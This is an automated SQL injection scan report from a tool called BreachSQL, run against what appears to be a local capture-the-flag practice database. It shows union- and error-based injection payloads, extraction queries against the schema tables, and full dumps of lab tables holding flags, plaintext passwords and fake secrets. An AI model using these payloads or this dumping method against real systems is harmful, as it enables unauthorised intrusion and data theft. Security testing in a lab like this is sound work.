BreachSQL Scan Report

Generated 2026-05-21 19:21 UTC

1. http://127.0.0.1:17476/challenges/my1/users?id=1

Duration
1.07s
Requests
83
Crawled URLs
0
Params tested
1
WAF
None
Evasion
None
Findings
6
Findings4 CRITICAL2 HIGH
#TypeSeverityLocationDetails
1extractionCRITICALhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
expr: VERSION()
value: 8.0.46
mode: union
2extractionCRITICALhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
expr: CURRENT_USER()
value: firerange@%
mode: union
3extractionCRITICALhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
expr: DATABASE()
value: firerange
mode: union
4extractionCRITICALhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
expr: (SELECT GROUP_CONCAT(table_name ORDER BY table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=...
value: challenges,my1_notes,my1_secrets,my1_users,my2_group_targets,my2_inbox,my2_members,my3_accounts,my3_catalog,my3_items...
mode: union
5error_based_sqliHIGHhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
payload: '
dbms: mysql
evidence: [{"db_error":"1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL ser...
6union_based_sqliHIGHhttp://127.0.0.1:17476/challenges/my1/users?id=1
parameter: id
method: GET
payload: UNION SELECT 'BreachSQL_tiludd',NULL-- -
column_count: 2
extracted: "},{"id":"BreachSQL_tiludd","username":null}]
challenges
0 rows  ·  8 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
challenge_idtiertitledescriptiontechniqueendpointpointsflag
my1_notes
3 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idauthorcontent
1adminFIRE{my1c_double_quote_error}
2alicemeeting at 3pm
3bobremember to patch the server
my1_secrets
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idnamevalue
1flagFIRE{my1b_union_secrets_extracted}
2api_keysk-firerange-0xdeadbeef
my1_users
4 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idusernameemailrole
1adminadmin@firerange.localadmin
2alicealice@firerange.localuser
3bobbob@firerange.localuser
4charliecharlie@firerange.localuser
my2_group_targets
3 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
iddeptscoreflag
1engineering42FIRE{my2e_having_group_by}
2marketing17not_the_flag
3sales99not_the_flag
my2_inbox
3 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idownermessage
1adminFIRE{my2d_second_step_extracted}
2aliceHello Alice
3bobHello Bob
my2_members
4 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idusernamepasswordsecret
1adminhunter2FIRE{my2a_boolean_blind_enumerated}
2alicep@ssw0rdalice_private_note
3bobqwerty123bob_private_note
4malloryevil1337FIRE{my2c_or_based_bypass}
my3_accounts
2 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idusernamedeptflag
1jsmithengineeringFIRE{my3e_paren_context_blind}
2jdoemarketingnot_the_flag
my3_catalog
3 rows  ·  6 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idtitlebrandskupriceflag
1Laptop ProTechCoLP-001999.99FIRE{my3d_five_col_union}
2MouseTechCoMS-00129.99not_the_flag
3KeyboardTypeFastKB-00179.99not_the_flag
my3_items
3 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idnamedescriptionprice
1Widget AStandard widget9.99
2Widget BPremium widget19.99
3Flag ItemFIRE{my3b_path_param_pwned}0.01
my3_products
3 rows  ·  4 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idnamecategoryflag
1Product XelectronicsFIRE{my3c_multicolumn_union}
2Product Yclothingred_herring_1
3Product Zfoodred_herring_2
my3_schema_flag
1 row  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idnoteflag
1hiddenFIRE{my3f_schema_walker}
my4_agent_log
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idagentflag
1Mozilla/5.0FIRE{my4f_header_injection}
2curl/7.0not_the_flag
my4_api_users
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
user_idusernametoken
1systemFIRE{my4b_json_body_injection}
2servicenot_a_flag_yet
my4_entries
3 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idlabelpayload
1normalbenign data
2flagFIRE{my4a_waf_bypass_comment}
3decoynothing_here
my4_hex_store
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idlabelflag
1publicnot_the_flag
2secretFIRE{my4h_hex_char_bypass}
my4_numeric_store
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idvalueflag
142FIRE{my4d_numeric_time_blind}
21337not_the_flag
my4_sessions
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
session_idusernameflag
sess_abc123adminFIRE{my4e_cookie_injection}
sess_def456alicenot_the_flag
my5_hidden
2 rows  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idkeyflag
1secretFIRE{my5b_crawl_and_conquer}
2decoynot_a_flag
my5_kwvault
1 row  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idlevelflag
1legendFIRE{my5c_keyword_doubling}
my5_oob_notes
1 row  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idnoteflag
1MySQL supports LOAD_FILE() and SELECT INTO OUTFILE for file-based OOB exfiltration.FIRE{my5d_oob_technique_recognised}
my5_reports
3 rows  ·  5 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idtitlebodyauthorstatus
1Q1 ReviewFinancial summary for Q1.adminpublished
2Incident LogSecurity incident details here.secteamclassified
3Dev NotesInternal architecture notes.devopsdraft
my5_vault
1 row  ·  3 columns  ·  http://127.0.0.1:17476/challenges/my1/users?id=1  ·  param: id  ·  method: GET
idlevelflag
1legendFIRE{my5a_legend_full_chain_owned}